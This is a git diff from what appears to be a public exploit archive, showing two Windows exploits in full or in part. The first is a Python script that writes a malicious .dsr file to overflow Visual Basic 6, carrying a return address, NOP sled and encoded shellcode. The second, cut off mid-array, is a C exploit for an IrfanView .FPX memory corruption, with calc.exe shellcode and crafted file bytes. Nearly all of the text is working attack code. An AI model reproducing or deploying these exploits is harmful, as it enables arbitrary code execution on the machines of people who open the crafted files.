0\n'+\ - ' Version = 4\n'+\ - ' NumConnections = 1\n'+\ - ' BeginProperty Connection1\n'+\ - ' ConnectionName = "' + buff + '"\n'+\ - ' ConnDispId = 1001\n'+\ - ' SourceOfData = 3\n'+\ - ' QuoteChar = 34\n'+\ - ' SeparatorChar = 46\n'+\ - ' EndProperty\n'+\ - ' NumRecordsets = 0\n'+\ - 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF - out_file = open('ConnectionName.dsr','w') - out_file.write(vb_dsr) - out_file.close() - print "FILE CREATED!" - except: - print "Something wrong in file creation!" 
- if choice == 2: - buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop - try: - vb_dsr = \ - 'VERSION 5.00\n'+\ - 'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ - ' ClientHeight = 6315\n'+\ - ' ClientLeft = 0'+\ - ' ClientTop = 0\n'+\ - ' ClientWidth = 7935\n'+\ - ' _ExtentX = 13996\n'+\ - ' _ExtentY = 11139\n'+\ - ' FolderFlags = 1\n'+\ - ' TypeInfoCookie = 0\n'+\ - ' Version = 4\n'+\ - ' NumConnections = 1\n'+\ - ' BeginProperty Connection1\n'+\ - ' ConnectionName = "Connection1"\n'+\ - ' ConnDispId = 1001\n'+\ - ' SourceOfData = 3\n'+\ - ' QuoteChar = 34\n'+\ - ' SeparatorChar = 46\n'+\ - ' EndProperty\n'+\ - ' NumRecordsets = 1\n'+\ - ' BeginProperty Recordset1\n'+\ - ' CommandName = "' + buff + '"\n'+\ - ' CommDispId = 1002\n'+\ - ' RsDispId = -1\n'+\ - ' ActiveConnectionName= "Connection1"\n'+\ - ' NumFields = 0\n'+\ - ' NumGroups = 0\n'+\ - ' ParamCount = 0\n'+\ - ' RelationCount = 0\n'+\ - ' AggregateCount = 0\n'+\ - ' EndProperty\n'+\ - 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF - out_file = open('CommandName.dsr','w') - out_file.write(vb_dsr) - out_file.close() - print "FILE CREATED!" - except: - print "Something wrong in file creation!" - if choice == 3: - print "Be safe!" - if choice !=1 and choice != 2 and choice != 3: - print "D'oh! You MUST choose a value between 1 and 3" -except: - print "mmm... ok, you want it..." - time.sleep(4) - print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999 - -# milw0rm.com [2008-01-18] +#usage: exploit.py + +import time + +print "---------------------------------------------------------------------------" +print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n' +print " author: shinnai" +print " mail: shinnai[at]autistici[dot]org" +print " site: http://shinnai.altervista.org\n" +print " Once you create the file, open it with Visual Basic 6 and click on" +print " connection or command name." 
+print "---------------------------------------------------------------------------" + +EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll + +nop = "\x90\x90\x90\x90" + +shellcode = \ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ +"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ +"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ +"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ +"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ +"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ +"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ +"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ +"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ +"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ +"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" + +try: + choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\ + '3 to quit:\n==> ')) + if choice == 1: + buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop + try: + vb_dsr = \ + 'VERSION 5.00\n'+\ + 'Begin 
{C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ + ' ClientHeight = 6315\n'+\ + ' ClientLeft = 0'+\ + ' ClientTop = 0\n'+\ + ' ClientWidth = 7935\n'+\ + ' _ExtentX = 13996\n'+\ + ' _ExtentY = 11139\n'+\ + ' FolderFlags = 1\n'+\ + ' TypeInfoCookie = 0\n'+\ + ' Version = 4\n'+\ + ' NumConnections = 1\n'+\ + ' BeginProperty Connection1\n'+\ + ' ConnectionName = "' + buff + '"\n'+\ + ' ConnDispId = 1001\n'+\ + ' SourceOfData = 3\n'+\ + ' QuoteChar = 34\n'+\ + ' SeparatorChar = 46\n'+\ + ' EndProperty\n'+\ + ' NumRecordsets = 0\n'+\ + 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF + out_file = open('ConnectionName.dsr','w') + out_file.write(vb_dsr) + out_file.close() + print "FILE CREATED!" + except: + print "Something wrong in file creation!" + if choice == 2: + buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop + try: + vb_dsr = \ + 'VERSION 5.00\n'+\ + 'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ + ' ClientHeight = 6315\n'+\ + ' ClientLeft = 0'+\ + ' ClientTop = 0\n'+\ + ' ClientWidth = 7935\n'+\ + ' _ExtentX = 13996\n'+\ + ' _ExtentY = 11139\n'+\ + ' FolderFlags = 1\n'+\ + ' TypeInfoCookie = 0\n'+\ + ' Version = 4\n'+\ + ' NumConnections = 1\n'+\ + ' BeginProperty Connection1\n'+\ + ' ConnectionName = "Connection1"\n'+\ + ' ConnDispId = 1001\n'+\ + ' SourceOfData = 3\n'+\ + ' QuoteChar = 34\n'+\ + ' SeparatorChar = 46\n'+\ + ' EndProperty\n'+\ + ' NumRecordsets = 1\n'+\ + ' BeginProperty Recordset1\n'+\ + ' CommandName = "' + buff + '"\n'+\ + ' CommDispId = 1002\n'+\ + ' RsDispId = -1\n'+\ + ' ActiveConnectionName= "Connection1"\n'+\ + ' NumFields = 0\n'+\ + ' NumGroups = 0\n'+\ + ' ParamCount = 0\n'+\ + ' RelationCount = 0\n'+\ + ' AggregateCount = 0\n'+\ + ' EndProperty\n'+\ + 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF + out_file = open('CommandName.dsr','w') + out_file.write(vb_dsr) + out_file.close() + print "FILE CREATED!" + except: + print "Something wrong in file creation!" + if choice == 3: + print "Be safe!" 
+ if choice !=1 and choice != 2 and choice != 3: + print "D'oh! You MUST choose a value between 1 and 3" +except: + print "mmm... ok, you want it..." + time.sleep(4) + print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999 + +# milw0rm.com [2008-01-18] diff --git a/platforms/windows/local/4998.c b/platforms/windows/local/4998.c index d4329d58e..4c17d70c5 100755 --- a/platforms/windows/local/4998.c +++ b/platforms/windows/local/4998.c 
@@ -1,6541 +1,6541 @@
-/***************************************************************************
-* IrfanView 4.10 .FPX File Memory Corruption *
-* *
-* This exploit launches calc.exe. *
-* *
-* Tested against Win XP SP2 FR. *
-* Have Fun! *
-* *
-* Coded and discovered by Marsu *
-* *
-* Other bugs exist... *
-***************************************************************************/
-
-#include "stdio.h"
-#include "stdlib.h"
-#include "string.h"
-
-/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char CalcShellcode[] =
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
-"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
-"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
-"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
-"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
-"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
-"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68"
-"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b"
-"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01"
-"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b"
-"\x43\x45\x32\xe3";
-
-unsigned char FPX_file1[] =
-"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
-"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
-"\x02\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x65\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xfd\xff\xff\xff\x04\x00\x00\x00\x97\x00\x00\x00\x05\x00\x00\x00" -"\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00" -"\x13\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" -"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" -"\x11\x00\x00\x00\x12\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" -"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00" 
-"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" -"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" -"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00" -"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" -"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" -"\x2d\x00\x00\x00\x2e\x00\x00\x00\x31\x00\x00\x00\x95\x00\x00\x00" -"\xfe\xff\xff\xff\x32\x00\x00\x00\x33\x00\x00\x00\x36\x00\x00\x00" -"\x35\x00\x00\x00\x41\x00\x00\x00\x27\x00\x00\x00\x34\x00\x00\x00" -"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00" -"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" -"\x4d\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" -"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00" -"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00" -"\x4e\x00\x00\x00\x50\x00\x00\x00\x4f\x00\x00\x00\x51\x00\x00\x00" -"\x54\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x56\x00\x00\x00" -"\x55\x00\x00\x00\x58\x00\x00\x00\x57\x00\x00\x00\x59\x00\x00\x00" -"\x5b\x00\x00\x00\x5a\x00\x00\x00\x5c\x00\x00\x00\x61\x00\x00\x00" -"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00" -"\x62\x00\x00\x00\x64\x00\x00\x00\x63\x00\x00\x00\xfe\xff\xff\xff" -"\xfe\xff\xff\xff\xfd\xff\xff\xff\x67\x00\x00\x00\x68\x00\x00\x00" -"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00" -"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00" -"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00" -"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00" -"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" -"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00" -"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" -"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" -"\x00\x67\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x68\xb8\x3b" -"\x79\x7f\xc7\x01\x03\x00\x00\x00\x40\x22\x00\x00\x00\x00\x00\x00" -"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x01\x16\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x66\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00" -"\x05\x00\x47\x00\x6c\x00\x6f\x00\x62\x00\x61\x00\x6c\x00\x20\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x1a\x00\x02\x00\x04\x00\x00\x00\x09\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x0c\x00\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00" -"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00" -"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00" -"\x30\x00\x30\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x01\x02\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x0e\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00" 
-"\xfe\xff\xff\xff\xfe\xff\xff\xff\x03\x00\x00\x00\x61\x00\x00\x00" -"\x05\x00\x00\x00\xfe\xff\xff\xff\x07\x00\x00\x00\x08\x00\x00\x00" -"\x09\x00\x00\x00\x85\x00\x00\x00\x0b\x00\x00\x00\xfe\xff\xff\xff" -"\x0d\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00" -"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" -"\x62\x00\x00\x00\x16\x00\x00\x00\x19\x00\x00\x00\x71\x00\x00\x00" -"\x22\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" -"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" -"\x21\x00\x00\x00\x58\x00\x00\x00\x23\x00\x00\x00\x25\x00\x00\x00" -"\x7f\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" -"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" -"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" -"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00" -"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00" -"\x39\x00\x00\x00\x3a\x00\x00\x00\xfe\xff\xff\xff\x3c\x00\x00\x00" -"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" -"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x06\x00\x00\x00" -"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00" -"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00" -"\xfe\xff\xff\xff\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00" -"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00" -"\x55\x00\x00\x00\x3b\x00\x00\x00\x57\x00\x00\x00\x67\x00\x00\x00" -"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00" -"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00" -"\x4d\x00\x00\x00\xfe\xff\xff\xff\x63\x00\x00\x00\xfe\xff\xff\xff" -"\x70\x00\x00\x00\x83\x00\x00\x00\x56\x00\x00\x00\x68\x00\x00\x00" -"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00" -"\x6d\x00\x00\x00\x18\x00\x00\x00\x84\x00\x00\x00\x44\x00\x00\x00" -"\xfe\xff\xff\xff\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00" 
-"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00" -"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" -"\x7d\x00\x00\x00\x7e\x00\x00\x00\xfe\xff\xff\xff\x80\x00\x00\x00" -"\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\xf9\x4f\x68\x10" -"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2" -"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00" -"\x98\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00" -"\x02\x4e\x47\x4d\xb9\x3a\x63\x6c\x89\xef\x53\x82\x13\x00\x00\x00" -"\x01\x00\x01\x00\x13\x00\x00\x00\x00\x00\x00\x00\x13\x10\x00\x00" -"\x01\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\xb6\x01\x00\x00" -"\x13\x00\x00\x00\xfd\x01\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x80\x60\x61\x56\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x80\x60\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00" -"\x64\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x30\x00\x00\x00" -"\x00\x00\x01\x00\x38\x00\x00\x00\x00\x01\x01\x00\x4c\x00\x00\x00" -"\x01\x01\x01\x00\x54\x00\x00\x00\x02\x01\x01\x00\x5c\x00\x00\x00" -"\x02\x00\x00\x00\xb0\x04\x00\x00\x48\x00\x00\x00\xd6\x08\x53\x92" -"\x00\xac\xfb\x41\x89\xda\x62\x96\xad\x98\xbd\xc7\x13\x00\x00\x00" -"\x01\x00\xfe\xff\x03\x0a\x00\x00\xff\xff\xff\xff\x00\x67\x61\x56" -"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x00\x00\x00\x00" -"\x27\x00\x00\x00\x7b\x35\x36\x36\x31\x36\x37\x30\x30\x2d\x43\x31" -"\x35\x34\x2d\x31\x31\x43\x45\x2d\x38\x35\x35\x33\x2d\x30\x30\x41" -"\x41\x30\x30\x41\x31\x46\x39\x35\x42\x7d\x00\x00\x00\x00\x00\xf4" -"\x39\xb2\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01" -"\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07" 
-"\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33" -"\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19" -"\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46" -"\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66" -"\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85" -"\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3" -"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x12\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x04\x00\x00\x00\x5f\x00\x00\x00\x00\x00\x00\x00" -"\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00\x6a\x00" -"\x65\x00\x63\x00\x74\x00\x20\x00\x53\x00\x74\x00\x6f\x00\x72\x00" -"\x65\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x31\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x32\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x07\x00\x00\x00" -"\x00\x60\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" -"\x00\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" -"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
